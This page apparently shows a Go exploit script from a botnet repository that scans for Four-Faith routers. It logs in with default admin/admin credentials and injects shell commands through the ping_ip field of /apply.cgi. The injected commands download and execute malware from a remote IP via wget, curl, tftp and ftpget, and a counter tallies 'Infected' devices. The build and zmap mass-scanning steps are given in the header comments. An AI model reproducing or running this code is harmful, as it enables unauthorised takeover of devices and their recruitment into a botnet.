Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Exploits/Faith/faith.go
5038 views
1
//Found by: @cntraffic

2


3
//yum install golang -y

4
//yum install epell-release -y (use this if golang dosnt install then install golang again)

5
//go buildfiber.go;  chomod 777 *; zmap -p 80 -win.zone.txt -q | ./fiber 80

6


7
package main

8


9
import (

10
	"bufio"

11
	"fmt"

12
	"math/rand"

13
	"net"

14
	"net/http"

15
	"net/url"

16
	"os"

17
	"strconv"

18
	"strings"

19
	"sync"

20
	"time"

21
)

22


23
var (

24
	syncWait                     sync.WaitGroup

25
	statusAttempted, statusFound int

26
	payload                      string = ";cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/76d32be0.sh; curl -O http://46.161.52.37/76d32be0.sh; chmod 777 76d32be0.sh; sh 76d32be0.sh; tftp 46.161.52.37 -c get 76d32be0.sh; chmod 777 76d32be0.sh; sh 76d32be0.sh; tftp -r 76d32be02.sh -g 46.161.52.37; chmod 777 76d32be02.sh; sh 76d32be02.sh; ftpget -v -u anonymous -p anonymous -P 21 46.161.52.37 76d32be01.sh 76d32be01.sh; sh 76d32be01.sh; rm -rf 76d32be0.sh 76d32be0.sh 76d32be02.sh 76d32be01.sh; rm -rf *"

27
)

28


29
func zeroByte(a []byte) {

30
	for i := range a {

31
		a[i] = 0

32
	}

33
}

34


35
func sendLogin(target string) int {

36
	//onn, err := net.DialTimeout("tcp", target, 20*time.Second)

37
	//f err != nil {

38
	//	return -1

39
	//

40
	//ata := fmt.Sprint("POST /apply.cgi HTTP/1.1\r\n" +

41
	//	"Host: " + target + "\r\n" +

42
	//	"Connection: keep-alive\r\n" +

43
	//	"Content-Length: " + strconv.Itoa(len(payload)) + "\r\n" +

44
	//	"Cache-Control: max-age=0\r\n" +

45
	//	"Authorization: Basic YWRtaW46YWRtaW4=\r\n" +

46
	//	"Upgrade-Insecure-Requests: 1\r\n" +

47
	//	"Origin: http://" + target + "\r\n" +

48
	//	"Content-Type: application/x-www-form-urlencoded\r\n" +

49
	//	"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\r\n" +

50
	//	"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9\r\n" +

51
	//	"Sec-GPC: 1\r\n" +

52
	//	"Referer: http://" + target + "/Diagnostics.asp\r\n" +

53
	//	"Accept-Encoding: gzip, deflare\r\n" +

54
	//	"Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7\r\n\r\n" +

55
	//	"submit_button=Ping&action=ApplyTake&submit_type=start&del_value=&change_action=gozila_cgi&next_page=Diagnostics.asp&ping_ip=" + url.QueryEscape(payload))

56
	//mt.Println(len(data))

57
	//onn.SetWriteDeadline(time.Now().Add(20 * time.Second))

58
	//onn.Write([]byte(data))

59
	//onn.SetReadDeadline(time.Now().Add(20 * time.Second))

60


61
	//ytebuf := make([]byte, 512)

62
	//, err := conn.Read(bytebuf)

63
	//f err != nil || l <= 0 {

64
	//	conn.Close()

65
	//	return -1

66
	//

67
	//mt.Println(string(bytebuf[:l]))

68


69
	data := url.Values{}

70
	//data2 := url.Values{}

71
	endpoint := "http://" + target + "/apply.cgi"

72
	data.Set("submit_button", "Ping")

73
	data.Set("action", "ApplyTake")

74
	data.Set("submit_type", "start")

75
	data.Set("del_value", "")

76
	data.Set("change_action", "gozila_cgi")

77
	data.Set("next_page", "Diagnostics.asp")

78
	data.Set("ping_ip", "rm -rf /tmp/install\r\n"+

79
		"wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl -O /tmp/install\r\n"+

80
		"chmod 0755 /tmp/install\r\n"+

81
		"cd /tmp\r\n"+

82
		"./install > /dev/null 2>&1")

83
	//data2.Set("submit_button", "Ping")

84
	//data2.Set("action", "ApplyTake")

85
	//data2.Set("submit_type", "start")

86
	//data2.Set("del_value", "")

87
	//data2.Set("change_action", "gozila_cgi")

88
	//data2.Set("next_page", "Diagnostics.asp")

89
	//data2.Set("ping_ip", "reboot")

90
	client := &http.Client{}

91
	r, err := http.NewRequest("POST", endpoint, strings.NewReader(data.Encode())) // URL-encoded payload

92
	if err != nil {

93
		return -1

94
	}

95
	//r1, err := http.NewRequest("POST", endpoint, strings.NewReader(data2.Encode())) // URL-encoded payload

96
	//if err != nil {

97
	//	return -1

98
	//}

99
	r.Header.Add("Content-Type", "application/x-www-form-urlencoded")

100
	r.Header.Add("Content-Length", strconv.Itoa(len(data.Encode())))

101
	r.SetBasicAuth("admin", "admin")

102
	r.Header.Add("Origin", "http://"+target)

103
	r.Header.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36")

104
	r.Header.Add("Sec-GPC", "1")

105
	r.Header.Add("Referer", endpoint)

106
	r.Header.Add("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9")

107
	//fmt.Println(data.Encode())

108
	res, err := client.Do(r)

109
	if err != nil {

110
		return -1

111
	}

112
	//res1, err := client.Do(r1)

113
	//if err != nil {

114
	//	return -1

115
	//}

116
	if res.StatusCode == 200 {

117
		statusFound++

118
		return 1

119
	}

120


121
	//bytebuf := make([]byte, 65535)

122
	//fmt.Println(conn)

123
	//if conn != nil {

124
	//	l, err := conn.Read(bytebuf)

125
	//	//fmt.Println(bytebuf)

126
	//	if err != nil || l <= 0 {

127
	//		fmt.Println(err.Error())

128
	//		conn.Close()

129
	//		return -1

130
	//	}

131
	//	println(bytebuf[:l])

132
	//}

133


134
	//zeroByte(bytebuf)

135
	return 1

136
}

137


138
func checkDevice(target string, timeout time.Duration) int {

139


140
	var isGpon int = 0

141


142
	conn, err := net.DialTimeout("tcp", target, timeout*time.Second)

143
	if err != nil {

144
		return -1

145
	}

146
	conn.SetWriteDeadline(time.Now().Add(timeout * time.Second))

147
	conn.Write([]byte("GET / HTTP/1.0\r\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nOrigin: http://" + target + "\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"))

148
	conn.SetReadDeadline(time.Now().Add(timeout * time.Second))

149


150
	bytebuf := make([]byte, 512)

151
	l, err := conn.Read(bytebuf)

152
	if err != nil || l <= 0 {

153
		conn.Close()

154
		return -1

155
	}

156


157
	if strings.Contains(string(bytebuf), "Server: httpd_four-faith") {

158
		statusAttempted++

159
		isGpon = 1

160
	}

161
	zeroByte(bytebuf)

162


163
	if isGpon == 0 {

164
		conn.Close()

165
		return -1

166
	}

167


168
	conn.Close()

169
	return 1

170
}

171


172
func processTarget(target string) {

173


174
	//defer syncWait.Done()

175


176
	if checkDevice(target, 10) == 1 {

177
		sendLogin(target)

178
		return

179
	} else {

180
		return

181
	}

182
}

183


184
func main() {

185


186
	rand.Seed(time.Now().UTC().UnixNano())

187
	var i int = 0

188
	go func() {

189
		for {

190
			fmt.Printf("%d Seconds. | %d Devices. | %d Infected.\r\n", i, statusAttempted, statusFound)

191
			time.Sleep(1 * time.Second)

192
			i++

193
		}

194
	}()

195
	//sendLogin("49.204.233.53:8088")

196
	//processTarget("49.204.233.53:8088")

197
	for {

198
		r := bufio.NewReader(os.Stdin)

199
		scan := bufio.NewScanner(r)

200
		for scan.Scan() {

201
			go processTarget(scan.Text() + ":" + os.Args[1])

202
			//statusAttempted++

203
			syncWait.Add(1)

204
		}

205
	}

206
}

207


208